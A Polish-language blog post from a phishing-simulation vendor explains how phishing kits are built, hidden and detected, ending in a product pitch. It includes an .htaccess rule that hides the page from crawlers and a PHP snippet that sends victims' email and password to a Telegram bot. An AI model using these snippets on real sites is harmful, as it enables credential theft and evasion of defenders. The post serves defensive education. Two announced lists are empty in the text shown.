← Wszystkie artykuły

Anatomia nowoczesnego zestawu phishingowego

GottaPhish Team · April 22, 2026

„Zestaw phishingowy” to spakowany, wielokrotnego użytku kod, który napastnicy wdrażają, aby sklonować stronę logowania, zebrać dane uwierzytelniające i je wyprowadzić. Zrozumienie, jak takie zestawy są zbudowane — i jak się ukrywają — znacznie ułatwia wczesne wykrywanie kampanii i budowanie przekonujących symulacji obronnych.

Co zawiera zestaw

Typowy zestaw to archiwum ZIP wrzucone na przejęty serwer albo tani hosting. Jego struktura jest zaskakująco stała:

kit/
├── index.php            # sklonowana strona docelowa
├── login.php            # obsługa formularza: przechwytuje + przekazuje dane logowania
├── assets/              # wierne kopie CSS, JS, logo, czcionek
├── config.php           # cel wyprowadzenia danych (e-mail, bot Telegram, zdalny URL)
├── antibots.php         # listy blokad dla crawlerów, sandboxów, badaczy
└── .htaccess            # przepisania, filtr geo/IP, ochrona przed hotlinkiem

Nowoczesne zestawy coraz częściej sprzedaje się „jako usługę” (PhaaS — Phishing-as-a-Service), wraz z panelami subskrypcyjnymi, aktualizacjami i wsparciem.

Klon

Strona docelowa to zwykle kopia bajt po bajcie prawdziwego ekranu logowania, zdjęta zgrywarką stron albo przeglądarką headless. Dwa znaki są częste:

Zaawansowane zestawy w czasie rzeczywistym pośredniczą wobec prawdziwej strony (układ adversary-in-the-middle z narzędziami takimi jak Evilginx), przekazując to, co wpisuje ofiara, do autentycznego serwera i kradnąc powstały plik cookie sesji — co pokonuje większość MFA.

Warstwa antyanaliza

Składnik antibots utrzymuje zestaw przy życiu. Filtruje odwiedzających, zanim poda stronę phishingową:

# fragment .htaccess
RewriteCond %{HTTP_USER_AGENT} (googlebot|bingbot|curl|python) [NC]
RewriteRule .* https://real-brand.example/ [R=302,L]

Dlatego adres URL, który analitykowi SOC „wygląda na martwy”, kilka minut wcześniej był w pełni żywy dla ofiary.

Przechwycenie i wyprowadzenie danych logowania

Skrypt sprawdza tylko tyle, by wyglądać wiarygodnie, po czym wysyła dane. Kanały wyprowadzania, mniej więcej według popularności:

$msg = "u={$_POST['email']}&p={$_POST['pass']}&ip={$_SERVER['REMOTE_ADDR']}";
file_get_contents("https://api.telegram.org/bot$TOKEN/sendMessage?chat_id=$ID&text=".urlencode($msg));
header("Location: https://real-brand.example/error");

Zwróć uwagę na końcowe przekierowanie: po „nieudanym logowaniu” ofiara trafia na prawdziwą stronę, zakłada literówkę, loguje się pomyślnie i niczego nie podejrzewa.

Hosting i dostarczanie

Zestawy wolą infrastrukturę jednorazową: przejęte witryny WordPress, otwarte przekierowania na zaufanych domenach, świeżo zarejestrowane łudząco podobne domeny oraz coraz częściej legalne usługi (Cloudflare Workers, IPFS, SharePoint, Google Docs), by pożyczyć ich reputację. Dostarczanie łączy zestaw z przynętą — fakturą, „ponowną weryfikacją” MFA, powiadomieniem o udostępnionym dokumencie.

Wykrywanie obronne

Sygnały warte tropienia:

Niewygodna prawda: dobrze zbudowany zestaw AiTM pokonuje MFA przez SMS i aplikację, kradnąc token sesji. Metody odporne na phishing — FIDO2 / passkey — to trwałe rozwiązanie.

Jak pomaga GottaPhish

Nowoczesne zestawy phishingowe robią broń z wiernych klonów i kradzieży sesji AiTM, które pokonują nawet MFA przez SMS i aplikację. GottaPhish i jego zespół ekspertów pomagają stawić czoła dokładnie temu zagrożeniu: bezpieczne, w pełni audytowane symulacje odwzorowujące prawdziwe zestawy — linki z tokenami, przepływy przechwytywania danych logowania, scenariusze AiTM — z pulpitami pokazującymi, które przynęty chwytają i gdzie MFA się broni. Nasi eksperci pomagają przy wdrożeniu, projektują scenariusze odtwarzające obecne rzemiosło PhaaS i pomagają interpretować wyniki jako ukierunkowane szkolenia oraz konkretne sygnały inżynierii wykrywania dla Twojego SOC.